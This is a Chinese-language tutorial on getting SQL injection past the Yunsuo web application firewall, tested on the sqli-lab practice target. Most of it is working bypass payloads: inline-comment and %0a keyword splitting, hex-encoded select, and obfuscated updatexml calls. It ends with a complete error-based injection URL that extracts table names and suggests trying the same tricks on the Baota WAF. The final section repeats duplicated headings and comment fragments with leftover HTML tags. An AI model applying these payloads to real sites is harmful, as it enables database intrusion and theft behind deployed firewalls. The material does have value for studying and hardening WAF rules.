Bypass云锁注入技术详解（第二集）<\/h1>

实验环境<\/h2>

PHP版本：5.4.5<\/li>
Web服务器：Apache<\/li>
WAF：云锁win_3.1.18.13（最新版）<\/li>

靶机：sqli-lab<\/li> <\/ul>

联合注入绕过技术<\/h2>

order by绕过<\/h3>

云锁对order by<\/code>有拦截，但可通过以下方式绕过：<\/p>

\/*!30000order*\/\/*!30000by*\/<\/span> 1<\/span>  -- 不拦截
<\/span><\/span><\/span><\/span>\/*!40000\/*!30000order*\/\/*!40000\/*!30000by*\/ 1  -- 不拦截
<\/span><\/span><\/span><\/code><\/pre>union select绕过<\/h3>
\/*!40000\/*!30000union*\/ \/*!40000\/*!30000all*\/ \/*!40000 \/*!30000select*\/1,2,3  -- 不拦截
<\/span><\/span><\/span><\/code><\/pre>系统函数绕过<\/h3>
云锁未拦截系统函数调用，但提供以下常用绕过方式：<\/p>
user<\/span>\/*!40000*\/<\/span>()
<\/span><\/span>database<\/span>%<\/span>0<\/span>a()
<\/span><\/span>version<\/span>\/**\/<\/span>()
<\/span><\/span>vsersion\/*!()*\/<\/span>
<\/span><\/span><\/code><\/pre>报错注入绕过技术<\/h2>
绕过报错函数<\/h3>
测试发现updatexml<\/code>函数与括号连接时会被拦截：<\/p>
updatexml()  -- 拦截
<\/span><\/span><\/span><\/span>updatexml\/*!40000()*\/<\/span>  -- 不拦截
<\/span><\/span><\/span><\/span>updatexml\/*!40000*\/<\/span>()  -- 不拦截
<\/span><\/span><\/span><\/span>\/*!40000updatexml*\/<\/span>()  -- 不拦截
<\/span><\/span><\/span><\/span>\/*!40000\/*!30000updatexml*\/()  -- 不拦截
<\/span><\/span><\/span><\/code><\/pre>绕过系统函数<\/h3>
database<\/span>()  -- 拦截
<\/span><\/span><\/span><\/span>database<\/span>\/*!40000*\/<\/span>()  -- 不拦截
<\/span><\/span><\/span><\/code><\/pre>数据查询绕过<\/h3>
当select<\/code>被拦截时，可使用以下方式：<\/p>
\/*!30000select*\/<\/span>  -- 不拦截
<\/span><\/span><\/span><\/span>\/*!30000%53elect*\/<\/span>  -- 不拦截（十六进制编码）
<\/span><\/span><\/span><\/code><\/pre>完整Payload示例<\/h2>
http:\/\/<\/span>192<\/span>.168<\/span>.1<\/span>.10<\/span>\/<\/span>sql<\/span>\/<\/span>Less<\/span>-<\/span>1<\/span>\/?<\/span>id=<\/span>1<\/span>' and updatexml\/*!40000*\/(1,concat(0x7e,(\/*!30000select*\/ %0agroup_concat(table_name) from%0ainformation_schema.tables%0awhere%0atable_schema="security"),0x7e),1)-- -
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>

云锁免费版对SQL注入的防护相对较弱<\/li>
主要绕过技术包括：

使用内联注释\/*!xxxxx*\/<\/code><\/li>
使用换行符%0a<\/code>分隔关键字<\/li>
对关键字进行十六进制编码<\/li>
在函数名和括号之间插入特殊字符<\/li>
<\/ul>
<\/li>
POST请求使用脏数据绕过可能更简单<\/li>
<\/ol>
注意事项<\/h2>

最新版云锁可能已修复部分绕过方式（如内联注释）<\/li>
实际测试中需根据具体环境调整绕过技术<\/li>
建议测试宝塔等其他WAF的绕过技术<\/li>
<\/ol>
评论反馈<\/h2>

有用户反馈最新版云锁已检测\/*!xxxxx<\/code>内联注释<\/li>
部分用户遇到绕过困难，可能与具体配置有关<\/li>
有需求测试宝塔WAF的SQL注入绕过技术<\/li>
<\/ol>

Bypass云锁注入技术详解（第二集）<\/h1>

联合注入绕过技术<\/h2>

报错注入绕过技术<\/h2>

评论反馈<\/h2> 有用户反馈最新版云锁已检测\/*!xxxxx<\/code>内联注释<\/li> 部分用户遇到绕过困难，可能与具体配置有关<\/li> 有需求测试宝塔WAF的SQL注入绕过技术<\/li> <\/ol>

评论反馈<\/h2>

有用户反馈最新版云锁已检测`\/*!xxxxx<\/code>内联注释<\/li>`
`部分用户遇到绕过困难，可能与具体配置有关<\/li>`
`有需求测试宝塔WAF的SQL注入绕过技术<\/li> <\/ol>`